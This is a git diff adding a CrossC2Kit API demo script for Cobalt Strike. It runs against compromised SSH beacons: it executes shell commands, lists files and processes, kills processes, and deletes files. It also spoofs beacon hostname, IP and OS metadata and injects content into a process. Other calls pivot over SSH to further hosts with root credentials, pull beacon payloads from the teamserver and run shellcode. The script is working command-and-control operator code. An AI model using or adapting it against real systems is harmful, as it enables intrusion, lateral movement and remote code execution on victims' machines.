CrossC2Kit API demo

gloxec · gloxec · commit 2cd5a74dc05b · 2022-06-06T17:48:39.000+08:00
diff --git a/third-party/api_demo/load.cna b/third-party/api_demo/load.cna
@@ -0,0 +1,86 @@
+
+println("---------- third party ----------------");
+
+sub callback_ls{
+    # $1 = beacon ID, $2 = the folder, $3 = results
+    $bid = $1;
+    $pwd = $2;
+    $res = $3;
+
+    blog($bid, @($pwd, $res));
+}
+
+sub callback_ps {
+    $bid = $1;
+    $res = $2;
+
+    blog($bid, @($res));
+}
+
+foreach $beacon (beacons()) {
+    if (!-isactive $beacon['id']) {
+    } else if (-isssh $beacon['id']) {
+        $bid = $beacon['id'];
+        blog($bid, "auto api test demo");  # 记录日志
+
+        bshell($bid, "echo \$AAA");  # 命令执行
+        bcc2_setenv($bid, "AAA", "ccc");  # 设置环境变量
+        bshell($bid, "echo \$AAA");
+
+        bcc2_unsetenv($bid, "AAA");     # 删除环境变量
+        bshell($bid, "echo \$AAA");
+
+        bsleep($bid, 2);    # 设置休眠时间
+
+        btask($bid, "list dir");  # 记录执行任务
+        bls($bid, "./", &callback_ls);  # 获取执行目录下的文件列表信息, 支持回调
+
+        btask($bid, "list process");
+        bps($bid, &callback_ps);  # 获取进程信息, 支持回调
+
+        bpwd($bid); # <---------- teamserver ignore
+        bmkdir($bid, "/tmp/1234");      # 创建目录
+        bcd($bid, "/tmp/1234");     # 切换工作目录
+        bpwd($bid);             # 获取工作目录
+
+        bkill($bid, 123);       # 结束指定PID进程
+        brm($bid, "/tmp/1234/aaa");    # 删除文件 / 文件夹
+        # brm($bid, "/tmp/1234/bbb");
+
+        bsetostype($bid, "printer");    # 修改 beacon 元数据中的操作系统类型
+        bsetlocalip($bid, "10.0.0.1");      # 修改 beacon 元数据中的内网IP
+        bsethostname($bid, "test_hostname");    # 修改 beacon 元数据中的主机名称
+
+    #  bcc2_inject($bid, $pid, $fileData, $temp_file_workpath);
+        # bshell($bid, "echo 0 > /proc/sys/kernel/yama/ptrace_scope");
+        bcc2_inject($bid, 1234, "aaaa", "/tmp/1234/");      # 向指定PID进程注入指定内容
+
+    # bssh_jump($bid, $username, $password, $privatekey, $passtype, $listener, $targetArray, $workspace);
+        bssh_jump($bid, "root", "123456", "", "ssh", "test_demo_cc2_listener", @("10.0.1.3", "10.0.1.4"), "/tmp/1234/");  # 向目标主机列表通过 SSH 协议，上线指定listener的beacon
+
+        $res = getSSHSession();     # 获取活跃状态的 CrossC2 会话
+        blog($bid, $res);
+
+        $res = getCrossC2Site();       # 获取服务端 CrossC2 beacon的下载地址
+        blog($bid, $res);
+
+        $res = getCrossC2Listener();    # 获取服务端配置的 CrossC2 监听器信息
+        blog($bid, $res);
+
+        $libbeacon = getCrossC2Beacon("test_demo_cc2_listener", "lib");     # 从服务端指定 CrossC2 监听器中获取动态库类型 beacon
+        $beacon = getCrossC2Beacon("test_demo_cc2_listener", "main");     # 从服务端指定 CrossC2 监听器中获取可执行文件类型 beacon
+        $len_libbeacon = size($libbeacon);
+        $len_beacon = size($beacon);
+        blog($bid, "libbeacon size: $len_libbeacon");
+        blog($bid, "beacon size: $len_beacon");
+
+
+        bcc2_unsetenv($bid, "AAA")
+        bshell($bid, "export");
+
+
+        # run shellcode
+        bshellcode($bid, "\\x90\\x90\\x90\\x90");           # 指定会话中执行 shellcode
+
+    }
+}
